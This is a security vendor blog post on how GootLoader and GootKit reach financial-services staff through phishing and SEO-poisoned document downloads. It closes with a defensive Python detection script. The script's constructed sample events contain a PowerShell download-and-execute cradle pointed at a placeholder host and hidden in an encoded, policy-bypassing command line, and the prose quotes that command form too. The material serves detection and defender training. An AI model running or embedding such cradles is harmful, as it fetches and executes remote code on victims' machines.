How Ransomware Groups Exploit “Business as Usual” in FinServ
Posted by: GuidePoint Security
Guest Author: Chris Hencinski, Senior Solutions Architect, Expel
In the first quarter of 2025, financial services was the most targeted industry. That is saying something, because manufacturing, healthcare, entertainment, hospitality, and legal services are heavily targeted too. By and large, FinServ remains a popular target for bad actors across the board.
It's not all bad news for FinServ, though. The GuidePoint Research and Intelligence Team (GRIT) observed a 24.5% decrease in ransomware attacks on banking and finance in 2024. GRIT attributes the drop to increased investment in cybersecurity across the industry, tighter regulatory compliance and enforcement, and targeted takedowns of ransomware groups by law enforcement agencies.
A decrease in ransomware, however, does not mean it’s no longer a threat to financial services. These businesses remain squarely in the bullseye for ransomware gangs because they host valuable data, critical systems, and often a patchwork of users, tools, and copious vendors. It’s where the money is—literally.
We have seen a growing number of ransomware attempts that don't come through the front door. They arrive disguised as something you were probably already looking for: a tax form, a Word doc with legal language, or, more recently, a ClickFix-style pop-up or malware signed with a fake code-signing certificate. It's important to catch these attacks early in their lifecycle. One of the most common culprits we've seen lately? GootLoader and GootKit.
Let’s talk about it.
GootLoader & GootKit: the Pre-ransomware Duo
GootLoader isn't an unknown at Expel. We've been reporting on and protecting against this malware for some time now. Neither GootLoader nor GootKit is ransomware itself. GootLoader is a malware loader, a tool that sneaks further malicious software into your environment, and GootKit is the backdoor it was originally built to deliver.
Think of them as the delivery crew. Once they’ve got a foothold, they phone home to command-and-control infrastructure, paving the way for bigger, badder payloads (like ransomware) to follow.
Attackers leverage these loaders using a combination of phishing and SEO poisoning (more on that in a moment), especially in pre-ransomware campaigns. And while we block these threats before they escalate, the initial tactics are worth a closer look because ransomware doesn’t just happen. There are multiple stages and steps to this kind of attack, and those first steps can be particularly dangerous to financial services.
Why Financial Services Teams are Easy Marks
There are two main reasons attackers are seeing success with GootKit/GootLoader in financial services:
- Constant vendor interaction
FinServ orgs work with a lot of vendors. It’s normal for someone in procurement or operations to get emails from companies they’ve never interacted with before. If one of those emails contains a document or a link that looks halfway legitimate? It’s not hard to imagine a well-meaning employee clicking on it.
That's the setup for GootLoader. The attackers know this. So they design emails and web pages that feel familiar enough to bypass suspicion.
- Document-driven workflows
Financial services is a document-heavy industry—loan forms, tax paperwork, compliance reports, contracts, regulatory filings. And a lot of that documentation comes from government sites or standardized templates. But when you need something in a hurry, what do you do?
You google it.
This is where attackers are getting clever. They compromise legitimate websites and seed them with malicious files, dressed up as free document downloads. Then they use SEO poisoning to push those pages to the top of the search results. So when your accounting assistant types "sample IRS form 433-D" into Google, they might get back a ZIP file that contains a GootLoader JavaScript file instead of (or alongside) the form they were looking for.
It’s not always obvious. In fact, it usually isn’t. And that’s exactly the point.
Spot These Attacks
From a detection standpoint, we often catch these attacks in the early stages—before full ransomware detonation.
Here’s a peek behind the curtain.
When GootLoader lands, it typically executes as a JavaScript or HTA file. We've seen command lines that spawn cscript.exe or launch suspicious PowerShell processes. Even without deep technical knowledge, a line like powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand ... should raise an eyebrow: nothing about it says "normal business process." (And if it doesn't raise your eyebrows, well, now you know.)
The attacker’s goal here is to establish a foothold, maintain persistence, and eventually download secondary payloads—like ransomware.
But that doesn’t mean your EDR will always catch it before something detonates.
Defending Against GootLoader & Friends
You don’t need a full threat intel team to get ahead of this stuff—though if you do need expert support, GuidePoint’s DFIR team can help detect and respond to these threats before they escalate. With that said, here are a few defensive plays you can start running today:
- Train employees to be document-skeptical. Encourage staff—especially those who rely heavily on templates and forms—not to blindly Google for documents. Set up internal resources with verified templates or work with vendors who can provide secure document repositories.
- Build better phishing detection muscle. The classic “check the sender” advice still applies. But consider extra scrutiny on inbound messages with document attachments, especially if they reference time-sensitive topics like taxes, compliance, or HR forms.
- Configure detection rules around scripting tools. Monitor for suspicious script execution (cscript.exe, encoded PowerShell commands, etc.). These might be rare in your environment—if they’re showing up, it’s worth investigating.
- Stop the spread before it starts. Pre-ransomware is stoppable. If you’re using an MDR service or an internal SOC, make sure they’re watching for early-stage loader activity and can act fast.
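Here is what the "configure detection rules around scripting tools" advice looks like as code. This is an added example, not Expel's or GuidePoint's detection content. It runs three rules over constructed process-creation events in the shape of Sysmon Event ID 1 (the field names, file paths, and the example.invalid URL are all assumptions made for the sample): a script host running a script out of a user-writable folder, PowerShell spawned by a script host, and PowerShell carrying the Bypass/Hidden flags or an -EncodedCommand, which the code decodes (PowerShell accepts any unambiguous prefix of -EncodedCommand and the argument is base64 of UTF-16LE text). It goes slightly beyond the post by also watching wscript.exe, because a double-clicked .js file runs under wscript.exe by default, and by including two benign records (a System32 licensing script and a logon script) to show what the rules deliberately let through.

```python
import base64
import re

# Constructed sample events in the shape of Sysmon Event ID 1 / EDR telemetry.
# None of this is real telemetry; the paths and the URL are invented.
SAMPLE_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_STAGE2.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # A double-clicked .js from a ZIP that came back from a poisoned search result
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\jdoe\Downloads\sample_irs_form_433-d.js"',
    },
    {   # The loader handing off to hidden, encoded PowerShell
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand " + SAMPLE_ENCODED,
    },
    {   # Benign: licensing script shipped in System32, run by a service host
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\cscript.exe",
        "CommandLine": r"cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dlv",
    },
    {   # Benign: logon script, no encoding, no Bypass/Hidden flags
        "ParentImage": r"C:\Windows\System32\gpscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File \\corp.example\netlogon\map-drives.ps1",
    },
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_FILE = re.compile(r"\.(?:js|jse|vbs|vbe|wsf|hta)\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(?:Downloads|Temp|AppData|Public|ProgramData)\\", re.IGNORECASE)
# The two flags quoted in the post. -NoProfile alone is too common in legitimate automation.
EVASION_FLAGS = re.compile(r"-(?:ex\w*\s+bypass|w\w*\s+hidden)", re.IGNORECASE)


def image_name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if the line has none.

    powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
    -enc, ...); -ep and -ex are prefixes of -ExecutionPolicy, so they are skipped.
    """
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lstrip("-/").lower()
        if tok[:1] in "-/" and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return "<undecodable EncodedCommand argument>"
    return None


def analyze_event(event):
    """Return a list of (rule, detail) findings for one process-creation event."""
    findings = []
    image = image_name(event["Image"])
    parent = image_name(event["ParentImage"])
    cmd = event["CommandLine"]

    # A script host running .js/.vbs/.hta out of a user-writable folder is the shape
    # of a downloaded loader being double-clicked; slmgr.vbs from System32 is not.
    if image in SCRIPT_HOSTS and SCRIPT_FILE.search(cmd) and USER_WRITABLE.search(cmd):
        findings.append(("script_host_user_writable_path", cmd))

    if image in POWERSHELL:
        # The loader handing off to PowerShell: the parent process is the tell.
        if parent in SCRIPT_HOSTS:
            findings.append(("powershell_spawned_by_script_host", f"{parent} -> {image}"))
        flags = EVASION_FLAGS.findall(cmd)
        if flags:
            findings.append(("powershell_evasion_flags", ", ".join(flags)))
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append(("powershell_encoded_command", decoded))
    return findings


def scan(events):
    """Run every rule over a batch of events; returns [(index, findings)] for hits only."""
    hits = []
    for i, event in enumerate(events):
        findings = analyze_event(event)
        if findings:
            hits.append((i, findings))
    return hits


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS):
        for rule, detail in findings:
            print(f"event {index}: {rule}: {detail}")
```

Decoding the EncodedCommand inline matters in practice: an alert that shows the analyst the actual download cradle is triaged in seconds, while one that shows a base64 blob is often snoozed. The user-writable-path and parent-process conditions are what keep the script-host rule from firing on every administrative VBScript in the estate; tune the folder list to where your own users actually save downloads.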
You don’t have to be a massive global bank to be a ransomware target. But you do need to think like one when it comes to risk mitigation. GootKit and GootLoader are persistent, sneaky, and successful because they exploit what many of us assume is “business as usual”—clicking a document link or downloading a form.
Staying ahead doesn’t mean stopping every attacker. It means creating enough friction that the next guy on the list looks like a better target (sorry, next guy).
And in most cases? That’s enough to win the day.
Download our FinServ threat report to learn more about industry trends. And check out our website to learn more about how Expel is working to keep financial data secure.